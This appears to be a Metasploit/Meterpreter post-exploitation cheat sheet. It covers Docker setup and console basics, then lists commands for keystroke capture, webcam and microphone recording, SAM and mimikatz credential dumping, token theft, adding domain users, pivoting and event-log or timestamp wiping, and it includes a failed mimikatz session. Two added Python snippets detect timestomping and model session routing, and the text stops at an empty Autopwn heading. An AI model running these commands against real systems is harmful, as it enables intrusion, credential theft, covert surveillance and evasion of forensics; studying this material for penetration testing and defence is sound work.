## Meterpreter Shell

Run in Docker (plain, or with shared storage and the default handler port forwarded):

```bash
docker run --rm -it metasploitframework/metasploit-framework ./msfconsole
docker run --rm -it -v "${HOME}/.msf:/home/msf/.msf4" -p 4444:4444 metasploitframework/metasploit-framework ./msfconsole
```

Using a bash function (the port to forward is the optional first argument):

```bash
function msfconsole {
  echo "Shared storage at ${HOME}/.msf"
  if [ -z "$1" ]
  then
    echo "forwarding 4444 -> 4444"
    # Mount the shared directory over ~/.msf4 inside the container, not over
    # all of /home/msf/, which would hide the image's own home directory.
    docker run --rm -it -v "${HOME}/.msf:/home/msf/.msf4" -p 4444:4444 metasploitframework/metasploit-framework ./msfconsole
  else
    echo "forwarding $1 -> $1"
    docker run --rm -it -v "${HOME}/.msf:/home/msf/.msf4" -p "$1:$1" metasploitframework/metasploit-framework ./msfconsole
  fi
}
# msfvenom output must be written under /data to land in the current host directory.
alias msfvenom='echo remember to save to -o /data/something ; docker run --rm -it -v "${HOME}/.msf:/home/msf/.msf4" -v "${PWD}:/data" metasploitframework/metasploit-framework ./msfvenom'
```

## Metasploit Console Basics

Search for a module:

```
msf > search [regex]
```

Specify an exploit to use:

```
msf > use exploit/[ExploitPath]
```

Specify a payload to use:

```
msf > set PAYLOAD [PayloadPath]
```

Show options for the current module:

```
msf > show options
```

Set an option:

```
msf > set [Option] [Value]
```

Start the exploit:

```
msf > exploit
```

Upgrade a plain shell session to Meterpreter:

```
sessions -u
```

## System Commands

| Command | Description |
| --- | --- |
| cd | Change directory |
| lcd | Change directory on the local (attacker's) machine |
| clearev | Clear the event log |
| download | Copy files from the target machine to the local machine |
| drop_token | Relinquish any active impersonation token |
| edit | Open a file in the default editor (typically vi) |
| execute | Execute a command with the privileges of the process Meterpreter is loaded in |
| getenv | Get one or more environment variable values |
| getpid | Get the identifier of the process Meterpreter is running inside |
| getprivs | Attempt to enable all privileges available to the current process |
| getsid | Get the SID of the user the server is running as |
| getuid | Get the user Meterpreter is running as |
| kill | Terminate a process |
| ps | List running processes |
| migrate | Jump to a given destination process ID |
| reboot | Reboot the remote computer |
| reg | Modify and interact with the remote registry |
| rev2self | Call RevertToSelf() on the remote machine |
| shell | Drop into a system command shell |
| shutdown | Shut down the remote computer |
| steal_token | Attempt to steal an impersonation token from the target process |
| suspend | Suspend or resume a list of processes |
| sysinfo | Get information about the remote system, such as the OS |
| upload | Copy files from the local machine to the target machine |
| timestomp | Alter NTFS file timestamps |
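The `timestomp` command above rewrites only the $STANDARD_INFORMATION timestamps that user-mode APIs can reach; the kernel-maintained $FILE_NAME timestamps are left alone, which is what forensic triage keys on. The following is an added example, not code from the page or from Metasploit: two common heuristics (SI creation earlier than FN creation, and SI times with a zero sub-second part) run over constructed MFT-style records.

```python
from datetime import datetime

# Constructed sample records (values made up for illustration). "si_*" are the
# $STANDARD_INFORMATION times a tool like timestomp can set; "fn_created" is the
# $FILE_NAME creation time, which only the kernel updates.
SAMPLE_RECORDS = [
    {"path": "C:\\Users\\alice\\report.docx",
     "si_created": datetime(2023, 5, 2, 10, 15, 30, 123456),
     "si_modified": datetime(2023, 5, 3, 9, 1, 12, 654321),
     "fn_created": datetime(2023, 5, 2, 10, 15, 30, 123456)},
    {"path": "C:\\Windows\\Temp\\svchost.exe",
     "si_created": datetime(2019, 1, 1, 0, 0, 0, 0),
     "si_modified": datetime(2019, 1, 1, 0, 0, 0, 0),
     "fn_created": datetime(2023, 5, 3, 14, 22, 7, 987654)},
]


def timestomp_indicators(rec):
    """Return the list of heuristic indicators that the SI times were rewritten."""
    hits = []
    # 1. FN creation is stamped when the file lands on disk; a later tool can push
    #    SI creation backwards but cannot move FN, so SI < FN is inconsistent.
    if rec["si_created"] < rec["fn_created"]:
        hits.append("si_created_before_fn_created")
    # 2. NTFS stores 100 ns ticks, so a genuine timestamp almost never has an
    #    exactly-zero fraction; tools that set times at second granularity do.
    for key in ("si_created", "si_modified"):
        if rec[key].microsecond == 0:
            hits.append(f"{key}_zero_fraction")
    return hits


def scan(records):
    """Map each suspicious path to its indicators; records with no hits are omitted."""
    findings = {}
    for rec in records:
        hits = timestomp_indicators(rec)
        if hits:
            findings[rec["path"]] = hits
    return findings


if __name__ == "__main__":
    for path, hits in scan(SAMPLE_RECORDS).items():
        print(path, hits)
```

Both checks are heuristics: files extracted from archives or renamed in place can trip them, so treat hits as leads to confirm against other artifacts rather than as proof.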

## Incognito Commands

```
meterpreter > load incognito
```

| Command | Description |
| --- | --- |
| add_group_user | Attempt to add a user to a global group with all tokens |
| add_localgroup_user | Attempt to add a user to a local group with all tokens |
| add_user | Attempt to add a user with all tokens |
| impersonate_token | Impersonate the specified token |
| list_tokens | List tokens available under the current user context |
| snarf_hashes | Snarf challenge/response hashes for every token |

```
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token DOMAIN\User
meterpreter > add_user newuser password -h 192.168.20.30   # Attempt to create user on Domain Controller
```

## User Interface Commands

| Command | Description |
| --- | --- |
| enumdesktops | List all accessible desktops and window stations |
| getdesktop | Get the current Meterpreter desktop |
| idletime | Return the number of seconds the GUI of the target machine has been idle |
| keyscan_dump | Dump the keystroke buffer |
| keyscan_start | Start capturing keystrokes |
| keyscan_stop | Stop capturing keystrokes |
| screenshot | Grab a screenshot of the interactive desktop |
| setdesktop | Change Meterpreter's current desktop |
| uictl [enable/disable] [keyboard/mouse] | Enable or disable the mouse or keyboard of the target machine |

## Webcam Commands

| Command | Description |
| --- | --- |
| record_mic | Record audio from the default microphone for X seconds |
| webcam_chat | Start a video chat |
| webcam_list | List webcams |
| webcam_snap | Take a snapshot from the specified webcam |
| webcam_stream | Play a video stream from the specified webcam |
| screengrab | Attempt to grab a screenshot from the process's active desktop |

## Elevate Commands

```
meterpreter > use priv
meterpreter > getsystem
meterpreter > getuid
```

| Command | Description |
| --- | --- |
| getsystem | Attempt to elevate your privilege to that of local SYSTEM |

## Password Database Commands

| Command | Description |
| --- | --- |
| hashdump | Dump the contents of the SAM database |

## Mimikatz Commands

```
meterpreter > load mimikatz
```

| Command | Description |
| --- | --- |
| kerberos | Attempt to retrieve Kerberos creds |
| livessp | Attempt to retrieve LiveSSP creds |
| mimikatz_command | Run a custom command |
| msv | Attempt to retrieve MSV creds (hashes) |
| ssp | Attempt to retrieve SSP creds |
| tspkg | Attempt to retrieve TsPkg creds |
| wdigest | Attempt to retrieve WDigest creds |

## Sniffer Commands

| Command | Description |
| --- | --- |
| sniffer_dump | Retrieve captured packet data to a PCAP file |
| sniffer_interfaces | Enumerate all sniffable network interfaces |
| sniffer_release | Free captured packets on a specific interface instead of downloading them |
| sniffer_start | Start packet capture on a specific interface |
| sniffer_stats | View statistics of an active capture |
| sniffer_stop | Stop packet capture on a specific interface |

## Lanattacks

| Command | Description |
| --- | --- |
| dhcp_load_options | Load DHCP options from a datastore |
| dhcp_log | Log DHCP server activity |
| dhcp_reset | Reset the DHCP server |
| dhcp_set_option | Set a DHCP server option |
| dhcp_start | Start the DHCP server |
| dhcp_stop | Stop the DHCP server |
| tftp_add_file | Add a file to the TFTP server |
| tftp_reset | Reset the TFTP server |
| tftp_start | Start the TFTP server |
| tftp_stop | Stop the TFTP server |

## Pivoting

Use a Meterpreter session to pivot onto other systems:

```
meterpreter > run get_local_subnets
meterpreter > background
msf exploit(handler) > route add <localsubnet> <netmask> [session]
```

| Command | Description |
| --- | --- |
| ipconfig | Show network interface information |
| portfwd | Forward packets through the TCP session |
| route | Manage/view the system's routing table |

## Useful Auxiliary Modules

Port scanner:

```
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
```

DNS enumeration:

```
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
```

FTP server:

```
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
```

Proxy server:

```
msf > use auxiliary/server/socks4
msf > run
```

## Managing Sessions

Exploit and background: run the exploit expecting a single session that is immediately backgrounded:

```
msf > exploit -z
```

Run the exploit as a job in the background, expecting one or more sessions that are immediately backgrounded:

```
msf > exploit -j
```

List all current jobs (usually exploit listeners):

```
msf > jobs -l
```

Kill a job:

```
msf > jobs -k [JobID]
```

## Managing Multiple Sessions

List all backgrounded sessions:

```
msf > sessions -l
```

Interact with a backgrounded session:

```
msf > sessions -i [SessionID]
```

Background the current interactive session:

```
meterpreter > <Ctrl+Z>
```

or

```
meterpreter > background
```

Routing through sessions: all modules (exploits/post/aux) run against the target subnet will be pivoted through this session.

```
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]
```
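The route table semantics above (and in the Pivoting section) can be shown by resolving a target address against routes written in the same `route add <subnet> <netmask> <session>` form. This is an added, simplified model of the framework's session routing, not Metasploit's own code: it assumes the most specific matching route wins and that an unmatched address goes out directly (`None`); the sample route lines are constructed.

```python
import ipaddress

# Constructed route table in the page's `route add <subnet> <netmask> <session>` form.
SAMPLE_ROUTES = [
    "route add 10.10.10.0 255.255.255.0 1",
    "route add 10.10.0.0 255.255.0.0 2",
    "route add 192.168.20.0 255.255.255.0 1",
]


def parse_routes(lines):
    """Turn `route add <subnet> <netmask> <session>` lines into (network, session) pairs."""
    routes = []
    for line in lines:
        parts = line.split()
        if len(parts) != 5 or parts[:2] != ["route", "add"]:
            raise ValueError(f"unrecognised route line: {line!r}")
        _, _, subnet, netmask, session = parts
        # ipaddress accepts a dotted netmask after the slash; strict=False tolerates host bits.
        network = ipaddress.ip_network(f"{subnet}/{netmask}", strict=False)
        routes.append((network, int(session)))
    return routes


def session_for(target, routes):
    """Return the session id whose route most specifically covers target, or None for a direct connection."""
    addr = ipaddress.ip_address(target)
    matches = [(net.prefixlen, sess) for net, sess in routes if addr in net]
    if not matches:
        return None
    # Longest prefix wins: 10.10.10.0/24 (session 1) beats 10.10.0.0/16 (session 2).
    return max(matches)[1]


if __name__ == "__main__":
    table = parse_routes(SAMPLE_ROUTES)
    for ip in ("10.10.10.5", "10.10.99.5", "192.168.20.30", "8.8.8.8"):
        print(ip, "->", session_for(ip, table))
```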

## Post Exploitation

### Migrating Processes

Migrate Meterpreter to another process:

```
meterpreter > migrate 1450
```

### Privilege Escalation

Load extensions:

```
meterpreter > load mimikatz
meterpreter > load incognito
```

Privilege Escalation:

```
meterpreter > use priv
meterpreter > getsystem
meterpreter > getuid
```

Token Impersonation:

```
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token DOMAIN\User
```

Steal Token:

```
meterpreter > steal_token [user PID]
```

Attempt to retrieve Kerberos or LiveSSP credentials (example session; every package reports KO here):

```
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)

meterpreter > livessp
[+] Running as SYSTEM
[*] Retrieving livessp credentials
livessp credentials
===================

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)

meterpreter > ssp
[+] Running as SYSTEM
[*] Retrieving ssp credentials
ssp credentials
===============

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------

meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID   Package    Domain        User             Password
------   -------    ------        ----             --------
0;996    Negotiate  NT AUTHORITY  NETWORK SERVICE  mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;997    Negotiate  NT AUTHORITY  LOCAL SERVICE    mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;47269  NTLM                                      mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;999    NTLM       THINC         RALPH$           mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)

meterpreter >
```

### Pivot into Internal Network

Attempt to create a user on the Domain Controller:

```
meterpreter > add_user newuser password -h 192.168.20.30
```

Pivot to other systems in the local network:

```
meterpreter > run get_local_subnets
meterpreter > background
msf exploit(handler) > route add <localsubnet> <netmask> [session]
```

### Autopwn

Download the Autopwn module: